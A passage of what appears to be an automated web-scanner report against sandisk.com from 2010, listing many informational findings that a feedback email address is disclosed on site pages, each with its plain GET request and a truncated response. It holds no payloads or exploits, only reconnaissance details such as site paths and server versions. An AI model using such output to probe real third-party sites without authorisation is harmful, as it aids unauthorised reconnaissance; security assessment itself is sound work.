Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39566
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.30. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.31. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.32. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40999
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.33. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.34. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39036
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.35. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.36. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/product-environmental-compliance

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40374
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.37. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.38. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38735
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.39. http://www.sandisk.com/about-sandisk/management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/management

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/management HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23148
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.40. http://www.sandisk.com/about-sandisk/management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/management/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/management/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23149
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.41. http://www.sandisk.com/about-sandisk/management/timeline-of-innovation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/management/timeline-of-innovation

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/management/timeline-of-innovation HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/management
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22484
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.42. http://www.sandisk.com/about-sandisk/media-kit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.43. http://www.sandisk.com/about-sandisk/media-kit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20397
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.44. http://www.sandisk.com/about-sandisk/media-kit/business-and-industry-association-links  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/business-and-industry-association-links

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/business-and-industry-association-links HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22019
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.45. http://www.sandisk.com/about-sandisk/media-kit/businessoem-products-brochures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/businessoem-products-brochures

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/businessoem-products-brochures HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28370
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.46. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/executive-officer-photos

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/executive-officer-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.47. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/executive-officer-photos.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/executive-officer-photos.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.48. http://www.sandisk.com/about-sandisk/media-kit/miscellaneous  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/miscellaneous

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/miscellaneous HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.49. http://www.sandisk.com/about-sandisk/media-kit/oem-product-photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/oem-product-photos

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/oem-product-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.50. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/retail-product-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.51. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/retail-product-photos/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
